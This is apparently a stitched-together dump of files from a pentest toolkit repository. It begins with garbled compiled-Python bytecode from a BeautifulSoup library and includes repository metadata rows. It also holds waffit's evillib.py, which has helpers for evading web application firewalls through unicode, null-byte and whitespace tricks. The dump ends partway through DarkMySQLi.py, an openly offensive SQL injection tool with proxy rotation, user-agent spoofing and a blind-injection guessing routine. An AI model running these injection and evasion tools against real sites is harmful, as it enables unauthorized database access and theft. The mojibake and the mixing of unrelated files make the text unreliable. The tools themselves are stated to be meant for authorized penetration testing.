objects.N(R?Rl(R R.((s%/pentest/waffit/libs/BeautifulSoup.pythandle_comment;scCs;|iott|ÉÉ}n d|}|i|ÉdS(s$Handle character references as data.s&#%s;N(RˇRÇRÖR7(R trefR=((s%/pentest/waffit/libs/BeautifulSoup.pythandle_charref?s  cCs¿d}|io.ytt|É}Wq>tj oq>Xn| o |io|ii|É}n| o,|io"|ii|É od|}n|pd|}n|i|ÉdS(sñHandle entity references as data, possibly converting known HTML and/or XML entity references to the corresponding Unicode characters.s&amp;%ss&%s;N( RRÅRÇRtKeyErrorRÑRÉRôR7(R RBR=((s%/pentest/waffit/libs/BeautifulSoup.pythandle_entityrefGs  cCs|i|tÉdS(s4Handle DOCTYPEs and the like as Declaration objects.N(R?Rm(R R=((s%/pentest/waffit/libs/BeautifulSoup.pyt handle_declrscCs‚d}|i||d!djog|iid|É}|djot|iÉ}n|i|d|!}|d}|i|tÉnWyti||É}Wn=tj o1|i|}|i |É|t|É}nX|S(s`Treat a bogus SGML declaration as raw data. Treat a CDATA declaration as a CData object.i s <![CDATA[s]]>iˇˇˇˇiN( RtrawdataR!R R?RiRtparse_declarationRR7(R RLtjRqR=ttoHandle((s%/pentest/waffit/libs/BeautifulSoup.pyRHvs    N(*RURVRWRR-R.R8R&RâR’RRRRRt ALL_ENTITIESRR#RERëRóR RRfRèRRR!RRR,R5R;R<R7R?R@RARCRERFRH(((s%/pentest/waffit/libs/BeautifulSoup.pyRˆ’sN   ) C !      .       + t BeautifulSoupc BsãeZdZdÑZed.dddddddd d g ÉZed d gÉZhd.d 6d.d 6Z ddddddddgZ dddddgZ hgd6gd6ddgd6gd6dgd6dgd 6Z hgd!6d!d"d#d$gd%6d%gd&6d%gd'6d!gd$6d!gd"6d!gd#6Z d(d)d*d gZed.e d+ee e ÉZege e e e ÉZeid,eiÉZd-ÑZRS(/s This parser knows the following facts about HTML: * Some tags have no closing tag and should be interpreted as being closed as soon as they are encountered. * The text inside some tags (ie. 'script') may contain tags which are not really part of the document and which should be parsed as text, not tags. If you want to parse the text as tags, you can always fetch it and parse it explicitly. * Tag nesting rules: Most tags can't be nested at all. For instance, the occurance of a <p> tag should implicitly close the previous <p> tag. <p>Para1<p>Para2 should be transformed into: <p>Para1</p><p>Para2 Some tags can be nested arbitrarily. For instance, the occurance of a <blockquote> tag should _not_ implicitly close the previous <blockquote> tag. Alice said: <blockquote>Bob said: <blockquote>Blah should NOT be transformed into: Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah Some tags can be nested, but the nesting is reset by the interposition of other tags. For instance, a <tr> tag should implicitly close the previous <tr> tag within the same <table>, but not close a <tr> tag in another table. <table><tr>Blah<tr>Blah should be transformed into: <table><tr>Blah</tr><tr>Blah but, <tr>Blah<table><tr>Blah should NOT be transformed into <tr>Blah<table></tr><tr>Blah Differing assumptions about tag nesting rules are a major source of problems with the BeautifulSoup class. If BeautifulSoup is not treating as nestable a tag your page author treats as nestable, try ICantBelieveItsBeautifulSoup, MinimalSoup, or BeautifulStoneSoup before writing your own subclass.cOsB|idÉp|i|d<nt|d<ti|||édS(NR˛R˚(RúRRERˆRó(R R™R/((s%/pentest/waffit/libs/BeautifulSoup.pyRó∫s tbrthrtinputtimgtmetatspacertlinktframetbasetprettextareatscripttspantfonttqtobjecttbdoRätsuptcentert blockquotetdivtfieldsettinstdeltoltultlitdltddtdtttablettbodyttfootttheadttrttdtthtaddresstformR4tnoscripts((^|;)\s*charset=)([^;]*)cCsîd}d}d}t}xmtdt|ÉÉD]V}||\}}|iÉ}|djo |}q.|djo|}|}q.q.W|o‘|oÕ|ii|É} | o∞|idj p|i|i jo@dÑ} |ii | |É} ||d| f||<t }q_| i dÉ} | o3| |ijo#| |_|i |iÉtÇq_qcn|id|É} | o|o t | _ndS(s¶Beautiful Soup can detect a charset included in a META tag, try to convert the document to that charset, and re-parse the document from the beginning.is http-equivtcontentcSs|idÉdS(Nis%SOUP-ENCODING%(RÄ(Rá((s%/pentest/waffit/libs/BeautifulSoup.pytrewritesiRQN(RRëR§R tlowert CHARSET_RERGR R R˝RäRERÄRRR;Rì(R R-t httpEquivt contentTypetcontentTypeIndexttagNeedsEncodingSubstitutionRLRöR_RáRvtnewAttrt newCharsetR(((s%/pentest/waffit/libs/BeautifulSoup.pyt start_metaÙs@          N(RURVRWRóRıRRR$R&R8tNESTABLE_INLINE_TAGStNESTABLE_BLOCK_TAGStNESTABLE_LIST_TAGStNESTABLE_TABLE_TAGStNON_NESTABLE_BLOCK_TAGSR.R-RâR’tMRxR(((s%/pentest/waffit/libs/BeautifulSoup.pyRLäs@.                RcBseZRS((RURV(((s%/pentest/waffit/libs/BeautifulSoup.pyR#stICantBelieveItsBeautifulSoupcBsheZdZddddddddd d d d d ddddgZdgZegeieeÉZRS(syThe BeautifulSoup class is oriented towards skipping over common HTML errors like unclosed tags. However, sometimes it makes errors of its own. For instance, consider this fragment: <b>Foo<b>Bar</b></b> This is perfectly valid (if bizarre) HTML. However, the BeautifulSoup class will implicitly close the first b tag when it encounters the second 'b'. It will think the author wrote "<b>Foo<b>Bar", and didn't close the first 'b' tag, because there's no real-world reason to bold something that's already bold. When it encounters '</b></b>' it will close two more 'b' tags, for a grand total of three tags closed instead of two. This can throw off the rest of your document structure. The same is true of a number of other tags, listed below. It's much more common for someone to forget to close a 'b' tag than to actually use nested 'b' tags, and the BeautifulSoup class handles the common case. This class handles the not-co-common case: where you can't believe someone wrote what they did, but it's valid HTML and BeautifulSoup screwed up by assuming it wouldn't be.temtbigRLtsmallttttabbrtacronymtstrongtcitetcodetdfntkbdtsamptvartbRt(RURVRWt*I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGSt)I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGSRıRLR-(((s%/pentest/waffit/libs/BeautifulSoup.pyRÜ&s   t MinimalSoupcBs eZdZedÉZhZRS(sîThe MinimalSoup class is for parsing HTML that contains pathologically bad markup. It makes no assumptions about tag nesting, but it does know which tags are self-closing, that <script> tags contain Javascript and should not be parsed, that META tags may contain encoding information, and so on. This also makes it better for subclassing than BeautifulStoneSoup or BeautifulSoup.Rt(RURVRWRıR.R-(((s%/pentest/waffit/libs/BeautifulSoup.pyRóJs t BeautifulSOAPcBseZdZdÑZRS(sÀThis class will push a tag with only a single string child into the tag's parent as an attribute. The attribute's name is the tag name, and the value is the string child. An example should give the flavor of the change: <foo><bar>baz</bar></foo> => <foo bar="baz"><bar>baz</bar></foo> You can then access fooTag['bar'] instead of fooTag.barTag.string. This is, of course, useful for scraping structures that tend to use subelements instead of attributes, such as SOAP messages. Note that it modifies its input, so don't print the modified version out. I'm not sure how many people really want to use this class; let me know if you do. Mainly I like the name.cCsªt|iÉdjoî|id}|id}|iÉt|tÉo\t|iÉdjoFt|idtÉo/|ii|i É o|id||i <q™nt i |ÉdS(Niiˇˇˇˇi˛ˇˇˇi( R RRòRRnR RR£RúR,RˆR(R R(R((s%/pentest/waffit/libs/BeautifulSoup.pyRks   &(RURVRWR(((s%/pentest/waffit/libs/BeautifulSoup.pyRòWstRobustXMLParsercBseZRS((RURV(((s%/pentest/waffit/libs/BeautifulSoup.pyRô~stRobustHTMLParsercBseZRS((RURV(((s%/pentest/waffit/libs/BeautifulSoup.pyRöÄstRobustWackAssHTMLParsercBseZRS((RURV(((s%/pentest/waffit/libs/BeautifulSoup.pyRõÇstRobustInsanelyWackAssHTMLParsercBseZRS((RURV(((s%/pentest/waffit/libs/BeautifulSoup.pyRúÑstSimplifyingSOAPParsercBseZRS((RURV(((s%/pentest/waffit/libs/BeautifulSoup.pyRùÜsR cBsbeZdZhdd6dd6ZgdedÑZdÑZdÑZd ÑZed ÑZ d ÑZ d ÑZ dfZ d ÑZh dgd6dd6dhd6did6djd6dkd6dld!6dmd$6dnd'6dod*6dpd-6dqd06drd36d4d56dsd86d4d96d4d:6dtd=6dud@6dvdC6dwdF6dxdI6dydL6dzdO6d{dR6d|dU6d}dX6d~d[6dd^6d4d_6dÄdb6dÅde6ZRS(ÇsœA class for detecting the encoding of a *ML document and converting it to a Unicode string. If the source encoding is windows-1252, can replace MS smart quotes with their HTML or XML equivalents.s mac-romant macintoshs shift-jissx-sjisR¯c CsÄd|_|i||É\|_}}||_g|_|djpt|tÉod|_t|É|_dSd}x)|D]!}|i |É}|oPqÄqÄW|p6x3||fD]!}|i |É}|oPqπqπWn| o>t o7t|itÉ o#|i t i |iÉdÉ}n|p0x-dD]!} |i | É}|oPq6q6Wn||_|p d|_ndS(NR∂RPsutf-8s windows-1252(sutf-8s windows-1252( RR t_detectEncodingR·R˛ttriedEncodingsRRR t _convertFromtchardettdetect( R R·toverrideEncodingsR˛R˚tdocumentEncodingtsniffedEncodingtutproposedEncodingtproposed_encoding((s%/pentest/waffit/libs/BeautifulSoup.pyRóµs>       ##  cCs`|ii|É}t|Étijo4|idjod|d}q\d|d}n|S(sDChanges a MS smart quote character to an XML or HTML entity.R¯s&#x%s;is&%s;i(tMS_CHARSRôRÍRÎRÒR˛(R torigRä((s%/pentest/waffit/libs/BeautifulSoup.pyt _subMSChar◊s cs“ài|É}| p|àijodSàii|Éài}àio;|iÉdjo(tidÉi áfdÜ|É}ny(ài ||É}|à_|à_ Wnt j o }dSXàiS(Ns windows-1252s iso-8859-1s iso-8859-2s([Ä-ü])csài|idÉÉS(i(R¨RÄ(R(R (s%/pentest/waffit/libs/BeautifulSoup.pyRçÔs(s windows-1252s iso-8859-1s iso-8859-2( t find_codecR†RR)R·R˛RwRâR’Rät _toUnicodeR RË(R tproposedR·Rßte((R s%/pentest/waffit/libs/BeautifulSoup.pyR°‚s$      c Cst|Édjo9|d djo(|dd!djod}|d}nºt|Édjo9|d djo(|dd!djod}|d}np|d d jod }|d}nK|d d jod }|d}n&|d d jod}|d}nt||É}|S(sGiven a string and its encoding, decodes the string into Unicode. %encoding is a string recognized by encodings.aliasesiis˛ˇtsutf-16besˇ˛sutf-16leisÔªøsutf-8t˛ˇsutf-32besˇ˛sutf-32le(R R(R R=RPtnewdata((s%/pentest/waffit/libs/BeautifulSoup.pyRÆ˛s&$$cCs*d$}}y[|d djo|i|É}n4|d djo"d}t|dÉidÉ}nt|ÉdjoK|d djo:|dd!djo&d}t|ddÉidÉ}n£|d d jo"d }t|d ÉidÉ}npt|ÉdjoK|d d jo:|dd!djo&d }t|dd ÉidÉ}n|d d jo"d }t|d ÉidÉ}nfl|d djo"d}t|dÉidÉ}n¨|d djo&d }t|dd ÉidÉ}nu|d djo&d}t|ddÉidÉ}n>|d djo&d}t|ddÉidÉ}nd}Wn d$}nXtidÉi|É}| o/|o(tidtiÉ}|i |É}n|d$j oL|i Édi É}|o ||_ n|o|d%jo |}qn|||fS(&s3Given a document, tries to detect its XML encoding.isLoßît<?sutf-16besutf-8is˛ˇR±s<?sutf-16lesˇ˛t<sutf-32bes<sutf-32leR≤sˇ˛isÔªøtasciis!^<\?.*encoding=['"](.*?)['"].*\?>s#<\s*meta[^>]+charset=([^>]*?)[;'">]isiso-10646-ucs-2sucs-2t csunicodesiso-10646-ucs-4sucs-4tcsucs4sutf-16sutf-32tutf_16tutf_32tutf16tu16N( siso-10646-ucs-2sucs-2R∑siso-10646-ucs-4sucs-4R∏sutf-16sutf-32sutf_16sutf_32sutf16su16( Rt_ebcdic_to_asciiRRRR RâR’RátIRGtgroupsRwR (R txml_dataR˚t xml_encodingtsniffed_xml_encodingtxml_encoding_matchtregexp((s%/pentest/waffit/libs/BeautifulSoup.pyRüsj $ $        cCsi|i|ii||ÉÉpJ|o|i|iddÉÉp'|o|i|iddÉÉp|S(Nt-R∂t_(t_codectCHARSET_ALIASESRôRN(R tcharset((s%/pentest/waffit/libs/BeautifulSoup.pyR≠[s##cCsI|p|Sd}yti|É|}Wnttfj onX|S(N(Rtcodecstlookupt LookupErrorR(R R…tcodec((s%/pentest/waffit/libs/BeautifulSoup.pyR«as  cCsx|i}|ipUd}ddk}|iditttdÉÉÉditt|ÉÉÉ|_n|i|iÉS(Niiiiiúi iÜiióiçiéi i i iiiiiiiùiÖiiáiiiíièiiiiiÄiÅiÇiÉiÑi iiiàiâiäiãiåiiiiêiëiiìiîiïiñiiòiôiöiõiiiûii i†i°i¢i£i§i•i¶ißi®i[i.i<i(i+i!i&i©i™i´i¨i≠iÆiØi∞i±i]i$i*i)i;i^i-i/i≤i≥i¥iµi∂i∑i∏iπi|i,i%i_i>i?i∫iªiºiΩiæiøi¿i¡i¬i`i:i#i@i'i=i"i√iaibicidieifigihiiiƒi≈i∆i«i»i…i ijikiliminioipiqiriÀiÃiÕiŒiœi–i—i~isitiuiviwixiyizi“i”i‘i’i÷i◊iÿiŸi⁄i€i‹i›ifiifli‡i·i‚i„i‰iÂiÊiÁi{iAiBiCiDiEiFiGiHiIiËiÈiÍiÎiÏiÌi}iJiKiLiMiNiOiPiQiRiÓiÔiiÒiÚiÛi\iüiSiTiUiViWiXiYiZiÙiıiˆi˜i¯i˘i0i1i2i3i4i5i6i7i8i9i˙i˚i¸i˝i˛iˇiˇˇˇˇR∂i(iiiiiúi iÜiióiçiéi i i iiiiiiiùiÖiiáiiiíièiiiiiÄiÅiÇiÉiÑi iiiàiâiäiãiåiiiiêiëiiìiîiïiñiiòiôiöiõiiiûii i†i°i¢i£i§i•i¶ißi®i[i.i<i(i+i!i&i©i™i´i¨i≠iÆiØi∞i±i]i$i*i)i;i^i-i/i≤i≥i¥iµi∂i∑i∏iπi|i,i%i_i>i?i∫iªiºiΩiæiøi¿i¡i¬i`i:i#i@i'i=i"i√iaibicidieifigihiiiƒi≈i∆i«i»i…i ijikiliminioipiqiriÀiÃiÕiŒiœi–i—i~isitiuiviwixiyizi“i”i‘i’i÷i◊iÿiŸi⁄i€i‹i›ifiifli‡i·i‚i„i‰iÂiÊiÁi{iAiBiCiDiEiFiGiHiIiËiÈiÍiÎiÏiÌi}iJiKiLiMiNiOiPiQiRiÓiÔiiÒiÚiÛi\iüiSiTiUiViWiXiYiZiÙiıiˆi˜i¯i˘i0i1i2i3i4i5i6i7i8i9i˙i˚i¸i˝i˛iˇ( RdtEBCDIC_TO_ASCII_MAPRbt maketransRªRîtchrR§R"(R RTR temapRb((s%/pentest/waffit/libs/BeautifulSoup.pyRΩls.   =teurot20ACsÄR∑sÅtsbquot201AsÇtfnoft192sÉtbdquot201EsÑthellipt2026sÖtdaggert2020sÜtDaggert2021sátcirct2C6sàtpermilt2030sâtScaront160sätlsaquot2039sãtOEligt152såt?sçs#x17Dt17Dsésèsêtlsquot2018sëtrsquot2019sítldquot201Csìtrdquot201Dsîtbullt2022sïtndasht2013sñtmdasht2014sóttildet2DCsòttradet2122sôtscaront161sötrsaquot203Asõtoeligt153súsùs#x17Et17EsûtYumlR∂süN(seuroR”(R‘R’(R÷R◊(RÿRŸ(R⁄R€(R‹R›(RfiRfl(R‡R·(R‚R„(R‰RÂ(RÊRÁ(RËRÈ(s#x17DRÎ(RÏRÌ(RÓRÔ(RRÒ(RÚRÛ(RÙRı(RˆR˜(R¯R˘(R˙R˚(R¸R˝(R˛Rˇ(RR(RR(s#x17ER(RR∂(RURVRWR»RëRóR¨R°RÆRüR≠R«RRŒRΩR™(((s%/pentest/waffit/libs/BeautifulSoup.pyR ®sZ  !   D    t__main__(?RWt __future__Rt __author__t __version__t __copyright__t __license__tsgmllibRRR t markupbaseRÎRâthtmlentitydefsRt ImportErrorR$RÚtsetsRR’ttagfindRát_declname_matchR]RRRRiRjRlRmRnRCRÓRDRÁR∏RıRˆRLRËRRÜRóRòRôRöRõRúRùR¢Rtcjkcodecs.aliasest cjkcodecst iconv_codecR RUtsyststdintsoupR»(((s%/pentest/waffit/libs/BeautifulSoup.pyt<module>NsÑ      ˇ"#ˇnw   ˇ∂ô$ ' ˇ  
66,733
Python
.py
479
135.605428
1,456
0.447157
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,911
evillib.py
pwnieexpress_raspberry_pwn/src/pentest/waffit/libs/evillib.py
#!/usr/bin/env python import re import sys import httplib import socket import urllib from urlparse import urlparse, urlunparse import logging from BeautifulSoup import BeautifulSoup __license__ = """ Copyright (c) 2009, {Sandro Gauci|Wendel G. Henrique} All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of EnableSecurity or Trustwave nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """ # unicode mapping borrowed from http://packetstormsecurity.org/web/unicode-fun.txt # by Gary O'leary-Steele of Sec-1 Ltd from urllib import quote, unquote unicodemapping = { ' ' : '%u0020', '/' : '%u2215', '\\' : '%u2215', "'" : '%u02b9', '"' : '%u0022', '>' : '%u003e', '<' : '%u003c', '#' : '%uff03', '!' : '%uff01', '$' : '%uff04', '*' : '%uff0a', '@' : '%u0040', '.' : '%uff0e', '_' : '%uff3f', '(' : '%uff08', ')' : '%uff09', ',' : '%uff0c', '%' : '%u0025', '-' : '%uff0d', ';' : '%uff1b', ':' : '%uff1a', '|' : '%uff5c', '&' : '%uff06', '+' : '%uff0b', '=' : '%uff1d', 'a' : '%uff41', 'A' : '%uff21', 'b' : '%uff42', 'B' : '%uff22', 'c' : '%uff43', 'C' : '%uff23', 'd' : '%uff44', 'D' : '%uff24', 'e' : '%uff45', 'E' : '%uff25', 'f' : '%uff46', 'F' : '%uff26', 'g' : '%uff47', 'G' : '%uff27', 'h' : '%uff48', 'H' : '%uff28', 'i' : '%uff49', 'I' : '%uff29', 'j' : '%uff4a', 'J' : '%uff2a', 'k' : '%uff4b', 'K' : '%uff2b', 'l' : '%uff4c', 'L' : '%uff2c', 'm' : '%uff4d', 'M' : '%uff2d', 'n' : '%uff4e', 'N' : '%uff2e', 'o' : '%uff4f', 'O' : '%uff2f', 'p' : '%uff50', 'P' : '%uff30', 'q' : '%uff51', 'Q' : '%uff31', 'r' : '%uff52', 'R' : '%uff32', 's' : '%uff53', 'S' : '%uff33', 't' : '%uff54', 'T' : '%uff34', 'u' : '%uff55', 'U' : '%uff35', 'v' : '%uff56', 'V' : '%uff36', 'w' : '%uff57', 'W' : '%uff37', 'x' : '%uff58', 'X' : '%uff38', 'y' : '%uff59', 'Y' : '%uff39', 'z' : '%uff5a', 'Z' : '%uff3a', '0' : '%uff10', '1' : '%uff11', '2' : '%uff12', '3' : '%uff13', '4' : '%uff14', '5' : '%uff15', '6' : '%uff16', '7' : '%uff17', '8' : '%uff18', '9' : '%uff19'} homoglyphicmapping = {"'" : '%ca%bc'} def oururlparse(target): log = logging.getLogger('urlparser') ssl = False o = urlparse(target) if o[0] not in ['http','https','']: log.error('scheme %s not supported' % o[0]) return if o[0] == 'https': ssl = True if len(o[2]) > 0: path = o[2] else: path = '/' tmp = o[1].split(':') if len(tmp) > 1: port = tmp[1] else: port = None hostname = tmp[0] query = o[4] return (hostname,port,path,query,ssl) def modifyurl(path,modfunc,log): path = path log.debug('path is currently %s' % path) #s = re.search('(\[.*?\])',path) for m in re.findall('(\[.*?\])',path): ourstr = m[1:-1] newstr = modfunc(ourstr) log.debug('String was %s' % ourstr) log.debug('String became %s' % newstr) path = path.replace(m,newstr) log.debug('the path is now %s' % path) return path def modifypath(path,newstrs,log,encode=True): log.debug('path is currently %s' % path) for m in re.findall('(\[.*?\])',path): ourstr = m[1:-1] for newstr in newstrs: if encode: newstr= urllib.quote(newstr) log.debug('String was %s' % ourstr) log.debug('String became %s' % newstr) newpath = path.replace(m,newstr).replace(']','').replace('[','') yield(newpath) def bruteforceascii(ourstr): listourstr = list(ourstr) for pos in xrange(len(ourstr)): for i in xrange(256): newlistourstr = listourstr[:] newlistourstr[pos] = chr(i) yield(quote(''.join(newlistourstr))) def unicodeurlencode(ourstr): newstr = str() for character in ourstr: if unicodemapping.has_key(character): newstr += unicodemapping[character] else: newstr += character return newstr def nullify(ourstr): newstr = str() for character in ourstr: newstr += character + "\x00" return quote(newstr) def replacechars(ourstr,origchar,newchar): newstr = ourstr.replace(origchar,newchar) return newstr def nullifyspaces(ourstr): return quote(replacechars(ourstr,' ','\x00')) def slashspaces(ourstr): return replacechars(ourstr,' ','/') def tabifyspaces(ourstr): return replacechars(ourstr,' ','\t') def crlfspaces(ourstr): return replacechars(ourstr,' ','\n') def backslashquotes(ourstr): return replacechars(ourstr,"'","\''") class waftoolsengine: def __init__(self,target='www.microsoft.com',port=80,ssl=False, debuglevel=0,path='/',followredirect=True): """ target: the hostname or ip of the target server port: defaults to 80 ssl: defaults to false """ self.target = target if port is None: if ssl: port = 443 else: port = 80 self.port = port self.ssl = ssl self.debuglevel=debuglevel self.cachedresponses = dict() self.requestnumber = 0 self.path = path self.redirectno = 0 self.followredirect = followredirect self.crawlpaths = list() def request(self,method='GET',path=None,usecache=True, cacheresponse=True, headers=None, comingfromredir=False): followredirect = self.followredirect if comingfromredir: self.redirectno += 1 if self.redirectno >= 5: self.log.error('We received way too many redirects.. stopping that') followredirect=False else: self.redirectno = 0 if path is None: path = self.path if headers is not None: knownheaders = map(lambda x: x.lower(), headers.keys()) else: knownheaders = {} headers = {} if not 'user-agent' in knownheaders: headers['User-Agent'] = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.1b1) Gecko/20081007 Firefox/3.0' if not 'accept-charset' in knownheaders: headers['Accept-Charset'] = 'ISO-8859-1,utf-8;q=0.7,*;q=0.7' if not 'accept' in knownheaders: headers['Accept'] = '*/*' k = str([method,path,headers]) if usecache: if self.cachedresponses.has_key(k): self.log.debug('Using cached version of %s, %s' % (method,path)) return self.cachedresponses[k] else: self.log.debug('%s not found in %s' % (k,self.cachedresponses.keys())) if sys.hexversion > 0x2060000: if self.ssl: h = httplib.HTTPSConnection(self.target,self.port,timeout=4) else: h = httplib.HTTPConnection(self.target,self.port,timeout=4) else: if self.ssl: h = httplib.HTTPSConnection(self.target,self.port) else: h = httplib.HTTPConnection(self.target,self.port) if self.debuglevel <= 10: if self.debuglevel > 1: h.set_debuglevel(self.debuglevel) try: self.log.info('Sending %s %s' % (method,path)) h.request(method,path,headers=headers) except socket.error: self.log.warn('Could not initialize connection to %s' % self.target) return self.requestnumber += 1 try: response = h.getresponse() responsebody = response.read() h.close() r = response, responsebody except (socket.error,socket.timeout,httplib.BadStatusLine): self.log.warn('Hey.. they closed our connection!') r = None if cacheresponse: self.cachedresponses[k] = r if r: if response.status in [301,302,307]: if followredirect: if response.getheader('location'): newloc = response.getheader('location') self.log.info('Redirected to %s' % newloc) pret = oururlparse(newloc) if pret is not None: (target,port,path,query,ssl) = pret if not port: port = 80 if target == '': target = self.target if port is None: port = self.port if not path.startswith('/'): path = '/'+path if (target,port,ssl) == (self.target,self.port,ssl): r = self.request(method,path,usecache,cacheresponse, headers,comingfromredir=True) else: self.log.warn('Tried to redirect to a different server %s' % newloc) else: self.log.warn('%s is not a well formatted url' % response.getheader('location')) return r def querycrawler(self,path=None,curdepth=0,maxdepth=1): self.log.debug('Crawler is visiting %s' % path) localcrawlpaths = list() if curdepth > maxdepth: self.log.info('maximum depth %s reached' % maxdepth) return r = self.request(path=path) if r is None: return response, responsebody = r try: soup=BeautifulSoup(responsebody) except: self.log.warn('could not parse the response body') return tags = soup('a') for tag in tags: try: href = tag["href"] if href is not None: tmpu = urlparse(href) if (tmpu[1] != '') and (self.target != tmpu[1]): # not on the same domain name .. ignore self.log.debug('Ignoring link because it is not on the same site %s' % href) continue if tmpu[0] not in ['http','https','']: self.log.debug('Ignoring link because it is not an http uri %s' % href) continue path = tmpu[2] if not path.startswith('/'): path = '/'+path if len(tmpu[4]) > 0: # found a query .. thats all we need location = urlunparse(('','',path,tmpu[3],tmpu[4],'')) self.log.info('Found query %s' % location) return href if path not in self.crawlpaths: href = urllib.unquote(path) self.log.debug('adding %s for crawling' % href) self.crawlpaths.append(href) localcrawlpaths.append(href) except KeyError: pass for nextpath in localcrawlpaths: r = self.querycrawler(path=nextpath,curdepth=curdepth+1,maxdepth=maxdepth) if r: return r def scrambledheader(header): c = 'connection' if len(header) != len(c): return False if header == c: return False for character in c: if c.count(character) != header.count(character): return False return True
14,944
Python
.py
366
26.401639
131
0.47451
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,912
DarkMySQLi.py
pwnieexpress_raspberry_pwn/src/pentest/darkmysqli/DarkMySQLi.py
#!/usr/bin/python # 1/30/09 ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # Multi-Purpose MySQL Injection Tool # FUNCTIONS # *union injection # *blind injection # *post and get method injection ** POST not working yet # *full information_schema enumeration # *table and column fuzzer # *database information extractor # *column length finder # *load_file fuzzer # *general info gathering # *MySQL hash cracker # FEATURES # *Round Robin Proxy w/ a proxy list (non-auth or auth proxies) # *Proxy Auth (works great with Squid w/ basic auth) # *Random browser agent chosen everytime the script runs # *debug mode for seeing every URL request, proxy used, browser agent used # Share the c0de! (f*ck Windows! Get a real OS!) # darkc0de Crew # www.darkc0de.com # rsauron[at]gmail[dot]com # Greetz to # d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, rechemen # and the darkc0de crew # This was written for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! # Intended for authorized Web Application Pen Testing! # CHANGES # 1.6 ADDED --end evasion setting # 1.5 Fixed --strart now starts at correct number instead of +1 # 1.4 Fixed schema mode when a table was specified - app would hand after last column # 1.3 Fixed Regular Expression Search in dump mode (should fixs issues of crazy html code when dumping) # 1.2 Fixed mode findcol - the way it replaced darkc0de in the output URL string # BE WARNED, THIS TOOL IS VERY LOUD.. import urllib, sys, re, os, socket, httplib, urllib2, time, random ##Set default evasion options here arg_end = "--" # examples "--", "/*", "#", "%00", "--&SESSIONID=00hn3gvs21lu5ke2f03bxr" <-- if you need vars after inj point arg_eva = "+" # examples "/**/" ,"+", "%20" ## colMax variable for column Finder colMax = 200 ## Set the default timeout value for requests socket.setdefaulttimeout(10) ## Default Log File Name logfile = "darkMySQLi.log" ## File Location to fuzz with for TABLE fuzzer tablefuzz = "tablesfuzz.txt" ## File Location to fuzz with for COLUMN fuzzer columnfuzz = "columnsfuzz.txt" ## File Location to fuzz with for LOAD_FILE fuzzer loadfilefuzz = "loadfilefuzz.txt" ## Agents agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", "Microsoft Internet Explorer/4.0b1 (Windows 95)", "Opera/8.00 (Windows NT 5.1; U; en)"] #URL Get Function def GetThatShit(head_URL): source = "" global gets;global proxy_num head_URL = head_URL.replace("+",arg_eva) request_web = urllib2.Request(head_URL) request_web.add_header('User-Agent',agent) while len(source) < 1: if arg_debug == "on": print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" try: gets+=1;proxy_num+=1 source = proxy_list[proxy_num % proxy_len].open(request_web).read() except (KeyboardInterrupt, SystemExit): raise except (urllib2.HTTPError): print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" break except: print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" raise return source #the guts and glory - Binary Algorithim that does all the guessing for the Blind Methodology def GuessValue(URL): lower = lower_bound;upper = upper_bound while lower < upper: try: mid = (lower + upper) / 2 head_URL = URL + ">"+str(mid) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: lower = mid + 1 else: upper = mid except (KeyboardInterrupt, SystemExit): raise except: pass if lower > lower_bound and lower < upper_bound: value = lower else: head_URL = URL + "="+str(lower) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: value = lower else: value = 63 print "Could not find the ascii character! There 